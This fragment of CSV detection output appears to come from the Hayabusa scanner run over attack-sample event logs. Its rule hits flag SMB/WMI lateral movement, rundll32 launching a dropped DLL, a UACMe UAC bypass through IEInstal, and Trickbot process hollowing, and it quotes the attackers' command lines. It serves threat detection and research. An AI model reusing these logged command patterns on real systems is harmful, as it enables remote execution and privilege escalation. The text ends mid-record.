https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 
07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | 
LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | 
Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: 
HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - 
File,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.218 
+09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 
+09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: 
C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 
+09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | 